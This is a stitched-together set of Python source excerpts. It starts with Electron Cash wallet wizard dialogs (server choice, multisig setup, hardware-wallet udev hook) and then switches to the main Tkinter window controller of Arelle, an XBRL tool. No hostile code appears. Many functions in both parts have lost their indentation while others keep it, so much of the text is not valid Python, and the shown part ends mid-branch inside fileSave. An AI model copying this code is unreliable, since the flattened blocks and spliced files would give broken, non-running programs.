        self.please_wait.setText(MSG_GENERATING_WAIT)
        self.refresh_gui()
        # run the task on a worker thread, then wait for it synchronously
        t = threading.Thread(target = task)
        t.start()
        t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next, extra_button=None):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
if extra_button:
self._add_extra_button_to_layout(extra_button, vbox)
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning=''):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electron Cash communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfil the same purpose only differing in "
"hardware. In most cases you simply want to let Electron Cash "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
network.auto_connect = (r == 0)
self.config.set_key('auto_connect', network.auto_connect, True)
if r == 1:
nlayout = NetworkChoiceLayout(self, network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
    @wizard_dialog
    def multisig_dialog(self, run_next):
        """Ask for the multisig scheme: m required signatures out of n cosigners.

        Returns (m, n).  The m slider's maximum tracks the current n so m can
        never exceed the number of cosigners.
        """
        cw = CosignWidget(2, 2)
        m_edit = QSlider(Qt.Horizontal, self)
        n_edit = QSlider(Qt.Horizontal, self)
        n_edit.setMinimum(1)
        n_edit.setMaximum(15)
        m_edit.setMinimum(1)
        m_edit.setMaximum(2)
        n_edit.setValue(2)
        m_edit.setValue(2)
        n_label = QLabel()
        m_label = QLabel()
        grid = QGridLayout()
        grid.addWidget(n_label, 0, 0)
        grid.addWidget(n_edit, 0, 1)
        grid.addWidget(m_label, 1, 0)
        grid.addWidget(m_edit, 1, 1)
        def on_m(m):
            m_label.setText(_('Require %d signatures')%m)
            cw.set_m(m)
        def on_n(n):
            n_label.setText(_('From %d cosigners')%n)
            cw.set_n(n)
            # keep m's slider range consistent with the chosen n
            m_edit.setMaximum(n)
        n_edit.valueChanged.connect(on_n)
        m_edit.valueChanged.connect(on_m)
        # initialize labels/cosign widget to the default 2-of-2
        on_n(2)
        on_m(2)
        vbox = QVBoxLayout()
        vbox.addWidget(cw)
        vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
        vbox.addLayout(grid)
        self.exec_layout(vbox, _("Multi-Signature Wallet"))
        m = int(m_edit.value())
        n = int(n_edit.value())
        return (m, n)
    # Holds the udev installer dialog while it is open (Linux only); None otherwise.
    linux_hw_wallet_support_dialog = None
    def on_hw_wallet_support(self):
        ''' Overrides base wizard's noop impl. Shows the Linux udev-rules
        installer dialog for hardware wallets (one instance at a time). '''
        if sys.platform.startswith("linux"):
            if self.linux_hw_wallet_support_dialog:
                # already open: just bring it to the front
                self.linux_hw_wallet_support_dialog.raise_()
                return
            # NB: this should only be imported from Linux
            from . import udev_installer
            self.linux_hw_wallet_support_dialog = udev_installer.InstallHardwareWalletSupportDialog(self.top_level_window(), self.plugins)
            self.linux_hw_wallet_support_dialog.exec_()
            # drop references so the dialog can be garbage-collected
            self.linux_hw_wallet_support_dialog.setParent(None)
            self.linux_hw_wallet_support_dialog = None
        else:
            self.show_error("Linux only facility. FIXME!")
    def showEvent(self, event):
        """Qt show handler: on the TaxCoin network, show a one-time informational
        dialog (deferred so the window is fully visible first)."""
        ret = super().showEvent(event)
        from electroncash import networks
        if networks.net is networks.TaxCoinNet and not self.config.get("have_shown_taxcoin_dialog"):
            # mark as shown up-front so re-entry cannot show it twice
            self.config.set_key("have_shown_taxcoin_dialog", True)
            # weak reference so the deferred dialog does not keep the wizard alive
            weakSelf = weakref.ref(self)
            def do_dialog():
                slf = weakSelf()
                if not slf:
                    # wizard already destroyed; nothing to show
                    return
                QMessageBox.information(slf, _("Electron Cash - Tax Coin"),
                    _("For TaxCoin, your existing wallet files and configuration have "
                      "been duplicated in the subdirectory taxcoin/ within your Electron Cash "
                      "directory.\n\n"
                      "To use TaxCoin, you should select a server manually, and then choose one of "
                      "the starred servers.\n\n"
                      "After selecting a server, select a wallet file to open."))
            # defer until after the show event has completed
            QTimer.singleShot(10, do_dialog)
        return ret
# ---------------------------------------------------------------------------
# CntlrWinMain.py
# ---------------------------------------------------------------------------
'''
Created on Oct 3, 2010
This module is Arelle's controller in windowing interactive UI mode
@author: Mark V Systems Limited
(c) Copyright 2010 Mark V Systems Limited, All rights reserved.
'''
from arelle import PythonUtil # define 2.x or 3.x string types
import os, sys, subprocess, pickle, time, locale, re, os.path
from tkinter import (Tk, TclError, Toplevel, Menu, PhotoImage, StringVar, BooleanVar, N, S, E, W, EW,
HORIZONTAL, VERTICAL, END, font as tkFont)
try:
from tkinter.ttk import Frame, Button, Label, Combobox, Separator, PanedWindow, Notebook
except ImportError: # 3.0 versions of tkinter
from ttk import Frame, Button, Label, Combobox, Separator, PanedWindow, Notebook
import tkinter.tix
import tkinter.filedialog
import tkinter.messagebox, traceback
from arelle.Locale import format_string
from arelle.CntlrWinTooltip import ToolTip
from arelle import XbrlConst
from arelle.PluginManager import pluginClassMethods
from arelle.UrlUtil import isHttpUrl
import logging
import threading, queue
from arelle import Cntlr
from arelle import (DialogURL, DialogLanguage,
DialogPluginManager, DialogPackageManager,
ModelDocument,
ModelManager,
PackageManager,
RenderingEvaluator,
TableStructure,
ViewWinDTS,
ViewWinProperties, ViewWinConcepts, ViewWinRelationshipSet, ViewWinFormulae,
ViewWinFactList, ViewWinFactTable, ViewWinRenderedGrid, ViewWinXml,
ViewWinRoleTypes, ViewFileRoleTypes, ViewFileConcepts,
ViewWinTests, ViewWinTree, ViewWinVersReport, ViewWinRssFeed,
ViewFileTests,
ViewFileRenderedGrid,
ViewFileRelationshipSet,
Updater
)
from arelle.ModelFormulaObject import FormulaOptions
from arelle.FileSource import openFileSource
# Module-level flags; presumably read by the startup loop to control GUI
# restart and command-line processing -- the consumer is not visible in this
# chunk, confirm against the module's entry point.
restartMain = True
readCommandLineArguments = True
class CntlrWinMain (Cntlr.Cntlr):
    def __init__(self, parent):
        """Construct Arelle's main desktop window.

        Builds the File/Tools/Help menus, the toolbar, the three tabbed panes,
        the message-log view, restores saved window geometry (clamped to the
        screen), and starts the background UI-thread queue.

        :param parent: the Tk root (or toplevel) widget hosting this controller
        """
        super(CntlrWinMain, self).__init__(hasGui=True)
        self.fileHistorySize = 20
        self.parent = parent
        self.filename = None
        self.dirty = False
        overrideLang = self.config.get("labelLangOverride")
        self.labelLang = overrideLang if overrideLang else self.modelManager.defaultLang
        self.data = {}
        if self.isMac: # mac Python fonts bigger than other apps (terminal, text edit, Word), and to windows Arelle
            _defaultFont = tkFont.nametofont("TkDefaultFont") # label, status bar, treegrid
            _defaultFont.configure(size=11)
            _textFont = tkFont.nametofont("TkTextFont") # entry widget and combobox entry field
            _textFont.configure(size=11)
            #parent.option_add("*Font", _defaultFont) # would be needed if not using defaulted font
            toolbarButtonPadding = 1
        else:
            toolbarButtonPadding = 4
        # route Tk callback exceptions through our wrapper class
        tkinter.CallWrapper = TkinterCallWrapper
        imgpath = self.imagesDir + os.sep
        if self.isMSW:
            icon = imgpath + "arelle.ico"
            parent.iconbitmap(icon, default=icon)
            #image = PhotoImage(file=path + "arelle32.gif")
            #label = Label(None, image=image)
            #parent.iconwindow(label)
        else:
            parent.iconbitmap("@" + imgpath + "arelle.xbm")
            # try with gif file
            #parent.iconbitmap(path + "arelle.gif")
        # ---- File menu ----
        self.menubar = Menu(self.parent)
        self.parent["menu"] = self.menubar
        self.fileMenu = Menu(self.menubar, tearoff=0)
        self.fileMenuLength = 1
        for label, command, shortcut_text, shortcut in (
                #(_("New..."), self.fileNew, "Ctrl+N", "<Control-n>"),
                (_("Open File..."), self.fileOpen, "Ctrl+O", "<Control-o>"),
                (_("Open Web..."), self.webOpen, "Shift+Alt+O", "<Shift-Alt-o>"),
                (_("Import File..."), self.importFileOpen, None, None),
                (_("Import Web..."), self.importWebOpen, None, None),
                ("PLUG-IN", "CntlrWinMain.Menu.File.Open", None, None),
                (_("Save"), self.fileSaveExistingFile, "Ctrl+S", "<Control-s>"),
                (_("Save As..."), self.fileSave, None, None),
                (_("Save DTS Package"), self.saveDTSpackage, None, None),
                ("PLUG-IN", "CntlrWinMain.Menu.File.Save", None, None),
                (_("Close"), self.fileClose, "Ctrl+W", "<Control-w>"),
                (None, None, None, None),
                (_("Quit"), self.quit, "Ctrl+Q", "<Control-q>"),
                #(_("Restart"), self.restart, None, None),
                (None, None, None, None),
                ("",None,None,None) # position for file history
                ):
            if label is None:
                self.fileMenu.add_separator()
            elif label == "PLUG-IN":
                # plug-ins may insert additional File menu entries here
                for pluginMenuExtender in pluginClassMethods(command):
                    pluginMenuExtender(self, self.fileMenu)
                    self.fileMenuLength += 1
            else:
                self.fileMenu.add_command(label=label, underline=0, command=command, accelerator=shortcut_text)
                # NOTE(review): shortcut may be None here; binding a None
                # sequence is suspect -- confirm an "if shortcut:" guard
                # wasn't intended.
                self.parent.bind(shortcut, command)
                self.fileMenuLength += 1
        self.loadFileMenuHistory()
        self.menubar.add_cascade(label=_("File"), menu=self.fileMenu, underline=0)
        # ---- Tools menu ----
        toolsMenu = Menu(self.menubar, tearoff=0)
        # This menu item triggers the default option which is not to use the factindex sqlite DB
        # (temporarily removed)
        #toolsMenu.add_checkbutton(label=_("Use FactIndex"), underline=0, command=self.useFactIndexCheckUncheck)
        validateMenu = Menu(self.menubar, tearoff=0)
        toolsMenu.add_cascade(label=_("Validation"), menu=validateMenu, underline=0)
        validateMenu.add_command(label=_("Validate"), underline=0, command=self.validate)
        # each validation option mirrors a persisted config entry via a traced BooleanVar
        self.modelManager.validateDisclosureSystem = self.config.setdefault("validateDisclosureSystem",False)
        self.validateDisclosureSystem = BooleanVar(value=self.modelManager.validateDisclosureSystem)
        self.validateDisclosureSystem.trace("w", self.setValidateDisclosureSystem)
        validateMenu.add_checkbutton(label=_("Disclosure system checks"), underline=0, variable=self.validateDisclosureSystem, onvalue=True, offvalue=False)
        validateMenu.add_command(label=_("Select disclosure system..."), underline=0, command=self.selectDisclosureSystem)
        self.modelManager.validateCalcLB = self.config.setdefault("validateCalcLB",False)
        self.validateCalcLB = BooleanVar(value=self.modelManager.validateCalcLB)
        self.validateCalcLB.trace("w", self.setValidateCalcLB)
        validateMenu.add_checkbutton(label=_("Calc Linkbase checks"), underline=0, variable=self.validateCalcLB, onvalue=True, offvalue=False)
        self.modelManager.validateInferDecimals = self.config.setdefault("validateInferDecimals",False)
        self.validateInferDecimals = BooleanVar(value=self.modelManager.validateInferDecimals)
        self.validateInferDecimals.trace("w", self.setValidateInferDecimals)
        validateMenu.add_checkbutton(label=_("Infer Decimals in calculations"), underline=0, variable=self.validateInferDecimals, onvalue=True, offvalue=False)
        self.modelManager.validateUtr = self.config.setdefault("validateUtr",True)
        self.validateUtr = BooleanVar(value=self.modelManager.validateUtr)
        self.validateUtr.trace("w", self.setValidateUtr)
        validateMenu.add_checkbutton(label=_("Unit Type Registry validation"), underline=0, variable=self.validateUtr, onvalue=True, offvalue=False)
        for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Validation"):
            pluginMenuExtender(self, validateMenu)
        formulaMenu = Menu(self.menubar, tearoff=0)
        formulaMenu.add_command(label=_("Parameters..."), underline=0, command=self.formulaParametersDialog)
        formulaMenu.add_command(label=_("Active formula..."), underline=0, command=self.activeFormulaDialog)
        toolsMenu.add_cascade(label=_("Formula"), menu=formulaMenu, underline=0)
        self.modelManager.formulaOptions = FormulaOptions(self.config.get("formulaParameters"))
        toolsMenu.add_command(label=_("Compare DTSes..."), underline=0, command=self.compareDTSes)
        cacheMenu = Menu(self.menubar, tearoff=0)
        rssWatchMenu = Menu(self.menubar, tearoff=0)
        rssWatchMenu.add_command(label=_("Options..."), underline=0, command=self.rssWatchOptionsDialog)
        rssWatchMenu.add_command(label=_("Start"), underline=0, command=lambda: self.rssWatchControl(start=True))
        rssWatchMenu.add_command(label=_("Stop"), underline=0, command=lambda: self.rssWatchControl(stop=True))
        toolsMenu.add_cascade(label=_("RSS Watch"), menu=rssWatchMenu, underline=0)
        self.modelManager.rssWatchOptions = self.config.setdefault("rssWatchOptions", {})
        toolsMenu.add_cascade(label=_("Internet"), menu=cacheMenu, underline=0)
        self.webCache.workOffline = self.config.setdefault("workOffline",False)
        self.workOffline = BooleanVar(value=self.webCache.workOffline)
        self.workOffline.trace("w", self.setWorkOffline)
        cacheMenu.add_checkbutton(label=_("Work offline"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
        # disabled legacy cache options kept for reference
        '''
        self.webCache.recheck = self.config.setdefault("webRecheck",False)
        self.webRecheck = BooleanVar(value=self.webCache.webRecheck)
        self.webRecheck.trace("w", self.setWebRecheck)
        cacheMenu.add_checkbutton(label=_("Recheck file dates weekly"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
        self.webCache.notify = self.config.setdefault("",False)
        self.downloadNotify = BooleanVar(value=self.webCache.retrievalNotify)
        self.downloadNotify.trace("w", self.setRetrievalNotify)
        cacheMenu.add_checkbutton(label=_("Notify file downloads"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
        '''
        cacheMenu.add_command(label=_("Clear cache"), underline=0, command=self.confirmClearWebCache)
        cacheMenu.add_command(label=_("Manage cache"), underline=0, command=self.manageWebCache)
        cacheMenu.add_command(label=_("Proxy Server"), underline=0, command=self.setupProxy)
        logmsgMenu = Menu(self.menubar, tearoff=0)
        toolsMenu.add_cascade(label=_("Messages log"), menu=logmsgMenu, underline=0)
        logmsgMenu.add_command(label=_("Clear"), underline=0, command=self.logClear)
        logmsgMenu.add_command(label=_("Save to file"), underline=0, command=self.logSaveToFile)
        self.modelManager.collectProfileStats = self.config.setdefault("collectProfileStats",False)
        self.collectProfileStats = BooleanVar(value=self.modelManager.collectProfileStats)
        self.collectProfileStats.trace("w", self.setCollectProfileStats)
        logmsgMenu.add_checkbutton(label=_("Collect profile stats"), underline=0, variable=self.collectProfileStats, onvalue=True, offvalue=False)
        logmsgMenu.add_command(label=_("Log profile stats"), underline=0, command=self.showProfileStats)
        logmsgMenu.add_command(label=_("Clear profile stats"), underline=0, command=self.clearProfileStats)
        toolsMenu.add_command(label=_("Language..."), underline=0, command=lambda: DialogLanguage.askLanguage(self))
        for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Tools"):
            pluginMenuExtender(self, toolsMenu)
        self.menubar.add_cascade(label=_("Tools"), menu=toolsMenu, underline=0)
        # ---- Help menu ----
        helpMenu = Menu(self.menubar, tearoff=0)
        for label, command, shortcut_text, shortcut in (
                (_("Check for updates"), lambda: Updater.checkForUpdates(self), None, None),
                (_("Manage plug-ins"), lambda: DialogPluginManager.dialogPluginManager(self), None, None),
                (_("Manage packages"), lambda: DialogPackageManager.dialogPackageManager(self), None, None),
                ("PLUG-IN", "CntlrWinMain.Menu.Help.Upper", None, None),
                (None, None, None, None),
                (_("About..."), self.helpAbout, None, None),
                ("PLUG-IN", "CntlrWinMain.Menu.Help.Lower", None, None),
                ):
            if label is None:
                helpMenu.add_separator()
            elif label == "PLUG-IN":
                for pluginMenuExtender in pluginClassMethods(command):
                    pluginMenuExtender(self, helpMenu)
            else:
                helpMenu.add_command(label=label, underline=0, command=command, accelerator=shortcut_text)
                # NOTE(review): shortcut is always None for these entries;
                # binding a None sequence is suspect -- confirm.
                self.parent.bind(shortcut, command)
        for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Help"):
            # NOTE(review): extends toolsMenu rather than helpMenu -- looks
            # like a copy/paste slip; confirm the intended target menu.
            pluginMenuExtender(self, toolsMenu)
        self.menubar.add_cascade(label=_("Help"), menu=helpMenu, underline=0)
        # ---- status bar ----
        windowFrame = Frame(self.parent)
        self.statusbar = Label(windowFrame, text=_("Ready..."), anchor=W)
        self.statusbarTimerId = self.statusbar.after(5000, self.uiClearStatusTimerEvent)
        self.statusbar.grid(row=2, column=0, columnspan=2, sticky=EW)
        #self.balloon = tkinter.tix.Balloon(windowFrame, statusbar=self.statusbar)
        # ---- toolbar ----
        # toolbar_images keeps PhotoImage references alive (Tk only holds weak refs)
        self.toolbar_images = []
        toolbar = Frame(windowFrame)
        menubarColumn = 0
        self.validateTooltipText = StringVar()
        for image, command, toolTip, statusMsg in (
                #("images/toolbarNewFile.gif", self.fileNew),
                ("toolbarOpenFile.gif", self.fileOpen, _("Open local file"), _("Open by choosing a local XBRL file, testcase, or archive file")),
                ("toolbarOpenWeb.gif", self.webOpen, _("Open web file"), _("Enter an http:// URL of an XBRL file or testcase")),
                ("toolbarSaveFile.gif", self.fileSaveExistingFile, _("Save file"), _("Saves currently selected local XBRL file")),
                ("toolbarClose.gif", self.fileClose, _("Close"), _("Closes currently selected instance/DTS or testcase(s)")),
                (None,None,None,None),
                ("toolbarFindMenu.gif", self.find, _("Find"), _("Find dialog for scope and method of searching")),
                (None,None,None,None),
                ("toolbarValidate.gif", self.validate, self.validateTooltipText, _("Validate currently selected DTS or testcase(s)")),
                ("toolbarCompare.gif", self.compareDTSes, _("Compare DTSes"), _("compare two DTSes")),
                (None,None,None,None),
                ("toolbarLogClear.gif", self.logClear, _("Messages Log | Clear"), _("Clears the messages log")),
                #(Combobox(toolbar, textvariable=self.findVar, values=self.findValues,
                #          ), self.logClear, _("Find options"), _("Select of find options")),
                ):
            tbControl = None
            if command is None:
                # a None entry renders as a vertical separator
                tbControl = Separator(toolbar, orient=VERTICAL)
                tbControl.grid(row=0, column=menubarColumn, padx=6)
            elif isinstance(image, Combobox):
                tbControl = image
                tbControl.grid(row=0, column=menubarColumn)
            else:
                image = os.path.join(self.imagesDir, image)
                try:
                    image = PhotoImage(file=image)
                    self.toolbar_images.append(image)
                    tbControl = Button(toolbar, image=image, command=command, style="Toolbutton", padding=toolbarButtonPadding)
                    tbControl.grid(row=0, column=menubarColumn)
                except TclError as err:
                    # missing/broken image: skip the button but keep building the toolbar
                    print(err)
            if tbControl is not None:
                if isinstance(toolTip,StringVar):
                    ToolTip(tbControl, textvariable=toolTip, wraplength=240)
                else:
                    ToolTip(tbControl, text=toolTip)
            menubarColumn += 1
        for toolbarExtender in pluginClassMethods("CntlrWinMain.Toolbar"):
            toolbarExtender(self, toolbar)
        toolbar.grid(row=0, column=0, sticky=(N, W))
        # ---- paned windows / tabbed panes ----
        paneWinTopBtm = PanedWindow(windowFrame, orient=VERTICAL)
        paneWinTopBtm.grid(row=1, column=0, sticky=(N, S, E, W))
        paneWinLeftRt = tkinter.PanedWindow(paneWinTopBtm, orient=HORIZONTAL)
        paneWinLeftRt.grid(row=0, column=0, sticky=(N, S, E, W))
        paneWinLeftRt.bind("<<NotebookTabChanged>>", self.onTabChanged)
        paneWinTopBtm.add(paneWinLeftRt)
        self.tabWinTopLeft = Notebook(paneWinLeftRt, width=250, height=300)
        self.tabWinTopLeft.grid(row=0, column=0, sticky=(N, S, E, W))
        paneWinLeftRt.add(self.tabWinTopLeft)
        self.tabWinTopRt = Notebook(paneWinLeftRt)
        self.tabWinTopRt.grid(row=0, column=0, sticky=(N, S, E, W))
        self.tabWinTopRt.bind("<<NotebookTabChanged>>", self.onTabChanged)
        paneWinLeftRt.add(self.tabWinTopRt)
        self.tabWinBtm = Notebook(paneWinTopBtm)
        self.tabWinBtm.grid(row=0, column=0, sticky=(N, S, E, W))
        self.tabWinBtm.bind("<<NotebookTabChanged>>", self.onTabChanged)
        paneWinTopBtm.add(self.tabWinBtm)
        # ---- message log view ----
        from arelle import ViewWinList
        self.logView = ViewWinList.ViewList(None, self.tabWinBtm, _("messages"), True)
        self.startLogging(logHandler=WinMainLogHandler(self)) # start logger
        logViewMenu = self.logView.contextMenu(contextMenuClick=self.contextMenuClick)
        logViewMenu.add_command(label=_("Clear"), underline=0, command=self.logClear)
        logViewMenu.add_command(label=_("Save to file"), underline=0, command=self.logSaveToFile)
        if self.hasClipboard:
            logViewMenu.add_command(label=_("Copy to clipboard"), underline=0, command=lambda: self.logView.copyToClipboard(cntlr=self))
        # ---- grid weighting: panes get the stretch, bars stay thin ----
        windowFrame.grid(row=0, column=0, sticky=(N,S,E,W))
        windowFrame.columnconfigure(0, weight=999)
        windowFrame.columnconfigure(1, weight=1)
        windowFrame.rowconfigure(0, weight=1)
        windowFrame.rowconfigure(1, weight=999)
        windowFrame.rowconfigure(2, weight=1)
        paneWinTopBtm.columnconfigure(0, weight=1)
        paneWinTopBtm.rowconfigure(0, weight=1)
        paneWinLeftRt.columnconfigure(0, weight=1)
        paneWinLeftRt.rowconfigure(0, weight=1)
        self.tabWinTopLeft.columnconfigure(0, weight=1)
        self.tabWinTopLeft.rowconfigure(0, weight=1)
        self.tabWinTopRt.columnconfigure(0, weight=1)
        self.tabWinTopRt.rowconfigure(0, weight=1)
        self.tabWinBtm.columnconfigure(0, weight=1)
        self.tabWinBtm.rowconfigure(0, weight=1)
        window = self.parent.winfo_toplevel()
        window.columnconfigure(0, weight=1)
        window.rowconfigure(0, weight=1)
        # ---- restore prior window geometry, clamped to the visible screen ----
        priorState = self.config.get('windowState')
        screenW = self.parent.winfo_screenwidth() - 16 # allow for window edge
        screenH = self.parent.winfo_screenheight() - 64 # allow for caption and menus
        if priorState == "zoomed":
            self.parent.state("zoomed")
            w = screenW
            h = screenH
        else:
            # NOTE(review): assumes 'windowGeometry' exists in config (re.match
            # on None raises TypeError) and that w/h end up bound for the
            # divider check below even when parsing fails -- confirm.
            priorGeometry = re.match("(\d+)x(\d+)[+]?([-]?\d+)[+]?([-]?\d+)",self.config.get('windowGeometry'))
            if priorGeometry and priorGeometry.lastindex >= 4:
                try:
                    w = int(priorGeometry.group(1))
                    h = int(priorGeometry.group(2))
                    x = int(priorGeometry.group(3))
                    y = int(priorGeometry.group(4))
                    if x + w > screenW:
                        if w < screenW:
                            x = screenW - w
                        else:
                            x = 0
                            w = screenW
                    elif x < 0:
                        x = 0
                        if w > screenW:
                            w = screenW
                    if y + h > screenH:
                        if y < screenH:
                            y = screenH - h
                        else:
                            y = 0
                            h = screenH
                    elif y < 0:
                        y = 0
                        if h > screenH:
                            h = screenH
                    self.parent.geometry("{0}x{1}+{2}+{3}".format(w,h,x,y))
                except:
                    pass
        # set top/btm divider
        topLeftW, topLeftH = self.config.get('tabWinTopLeftSize',(250,300))
        if 10 < topLeftW < w - 60:
            self.tabWinTopLeft.config(width=topLeftW)
        if 10 < topLeftH < h - 60:
            self.tabWinTopLeft.config(height=topLeftH)
        # ---- final setup ----
        self.showTitle(filename=None)
        self.logFile = None
        self.uiThreadQueue = queue.Queue() # background processes communicate with ui thread
        self.uiThreadChecker(self.statusbar) # start background queue
        self.modelManager.loadCustomTransforms() # load if custom transforms not loaded
        if not self.modelManager.disclosureSystem.select(self.config.setdefault("disclosureSystem", None)):
            self.validateDisclosureSystem.set(False)
            self.modelManager.validateDisclosureSystem = False
        self.setValidateTooltipText()
    def useFactIndexCheckUncheck(self): #TODO: useFactIndex
        # Toggles the (currently disabled) fact-index SQLite option.
        # NOTE(review): self.useFactIndex is not initialized in __init__, so
        # the first call would raise AttributeError unless set elsewhere --
        # confirm.
        self.useFactIndex = not self.useFactIndex
def showTitle(self, modelXbrl=None, filename=None):
reportName = None
if filename is None:
if modelXbrl is None:
filename = "Unnamed"
else:
filename = os.path.basename(modelXbrl.modelDocument.uri)
if modelXbrl is not None and modelXbrl.reportName is not None:
reportName = modelXbrl.reportName
if reportName is None:
self.parent.title(_("arelle - {0}").format(filename))
else:
self.parent.title(_("arelle - {0} - {1}").format(filename, reportName))
# worker threads to show title
def triggerShowTitle(self, modelXbrl=None, filename=None):
if self.testMode:
self.showTitle(modelXbrl, filename)
else:
self.uiThreadQueue.put((self.showTitle, [modelXbrl, filename]))
def onTabChanged(self, event, *args):
try:
widgetIndex = event.widget.index("current")
tabId = event.widget.tabs()[widgetIndex]
for widget in event.widget.winfo_children():
if str(widget) == tabId:
self.currentView = widget.view
modelXbrl = self.getModelXbrl()
self.showTitle(modelXbrl=modelXbrl)
break
except (AttributeError, TypeError, TclError):
pass
    def loadFileMenuHistory(self):
        """Rebuild the File menu's trailing cascades: recent files, recent
        imports, and (when any are enabled) taxonomy packages."""
        # remove the previously added cascades at the end of the File menu
        self.fileMenu.delete(self.fileMenuLength, self.fileMenuLength + 2)
        fileHistory = self.config.setdefault("fileHistory", [])
        self.recentFilesMenu = Menu(self.menubar, tearoff=0)
        for i in range( min( len(fileHistory), self.fileHistorySize ) ):
            # j=i binds the loop value at definition time (late-binding closure fix)
            self.recentFilesMenu.add_command(
                 label=fileHistory[i],
                 command=lambda j=i: self.fileOpenFile(self.config["fileHistory"][j]))
        self.fileMenu.add_cascade(label=_("Recent files"), menu=self.recentFilesMenu, underline=0)
        importHistory = self.config.setdefault("importHistory", [])
        self.recentAttachMenu = Menu(self.menubar, tearoff=0)
        for i in range( min( len(importHistory), self.fileHistorySize ) ):
            self.recentAttachMenu.add_command(
                 label=importHistory[i],
                 command=lambda j=i: self.fileOpenFile(self.config["importHistory"][j],importToDTS=True))
        self.fileMenu.add_cascade(label=_("Recent imports"), menu=self.recentAttachMenu, underline=0)
        self.packagesMenu = Menu(self.menubar, tearoff=0)
        hasPackages = False
        for i, packageInfo in enumerate(sorted(PackageManager.packagesConfig.get("packages", []),
                                               key=lambda packageInfo: packageInfo.get("name")),
                                        start=1):
            name = packageInfo.get("name", "package{}".format(i))
            URL = packageInfo.get("URL")
            if name and URL and packageInfo.get("status") == "enabled":
                # url=URL binds the value at definition time, same as above
                self.packagesMenu.add_command(
                     label=name,
                     command=lambda url=URL: self.fileOpenFile(url))
                hasPackages = True
        if hasPackages:
            self.fileMenu.add_cascade(label=_("Packages"), menu=self.packagesMenu, underline=0)
    def onPackageEnablementChanged(self):
        # Rebuild the File menu cascades so the Packages submenu reflects
        # the new enablement state.
        self.loadFileMenuHistory()
def fileNew(self, *ignore):
if not self.okayToContinue():
return
self.logClear()
self.dirty = False
self.filename = None
self.data = {}
self.showTitle(filename=None)
self.modelManager.load(None);
def getViewAndModelXbrl(self):
view = getattr(self, "currentView", None)
if view:
modelXbrl = None
try:
modelXbrl = view.modelXbrl
return (view, modelXbrl)
except AttributeError:
return (view, None)
return (None, None)
def getModelXbrl(self):
view, modelXbrl = self.getViewAndModelXbrl()
return modelXbrl
    def okayToContinue(self):
        """Return True when it is safe to discard the current document state.

        Flushes any pending fact-prototype edits, then prompts the user if
        either the controller or the open model has unsaved modifications.
        """
        view, modelXbrl = self.getViewAndModelXbrl()
        documentIsModified = False
        if view is not None:
            try:
                # What follows only exists in ViewWinRenderedGrid
                view.updateInstanceFromFactPrototypes()
            except AttributeError:
                pass
        if modelXbrl is not None:
            documentIsModified = modelXbrl.isModified()
        if not self.dirty and (not documentIsModified):
            return True
        reply = tkinter.messagebox.askokcancel(
                    _("arelle - Unsaved Changes"),
                    _("Are you sure to close the current instance without saving?\n (OK will discard changes.)"),
                    parent=self.parent)
        if reply is None:
            # NOTE(review): askokcancel returns a bool, so this branch looks
            # unreachable -- kept for safety; confirm before removing.
            return False
        else:
            return reply
    def fileSave(self, event=None, view=None, fileType=None,
                 filenameFromInstance=False, initialfile=None, *ignore):
        """Save the content of the current (or given) view to a file.

        Dispatches on the view's type: rendered grid (HTML/XML layout or XBRL
        instance), testcase results (CSV), tree views (CSV/HTML/XML/JSON), or
        the formula output instance (XML).  Returns True on completion, False
        when the user cancels the file dialog.

        :param view: view to save; defaults to self.currentView
        :param fileType: "html", "xml", "xbrl", or None to ask
        :param filenameFromInstance: reuse the open instance's filepath
        :param initialfile: preset name for the save dialog
        """
        if view is None:
            view = getattr(self, "currentView", None)
        if view is not None:
            filename = None
            modelXbrl = None
            try:
                modelXbrl = view.modelXbrl
            except AttributeError:
                pass
            if filenameFromInstance:
                try:
                    modelXbrl = view.modelXbrl
                    filename = modelXbrl.modelDocument.filepath
                    if filename.endswith('.xsd'): # DTS entry point, no instance saved yet!
                        filename = None
                except AttributeError:
                    pass
            if isinstance(view, ViewWinRenderedGrid.ViewRenderedGrid):
                initialdir = os.path.dirname(modelXbrl.modelDocument.uri)
                if fileType in ("html", "xml", None):
                    if fileType == "html" and filename is None:
                        filename = self.uiFileDialog("save",
                                title=_("arelle - Save HTML-rendered Table"),
                                initialdir=initialdir,
                                filetypes=[(_("HTML file .html"), "*.html"), (_("HTML file .htm"), "*.htm")],
                                defaultextension=".html")
                    elif fileType == "xml" and filename is None:
                        filename = self.uiFileDialog("save",
                                title=_("arelle - Save Table Layout Model"),
                                initialdir=initialdir,
                                filetypes=[(_("Layout model file .xml"), "*.xml")],
                                defaultextension=".xml")
                    else: # ask file type
                        if self.testMode:
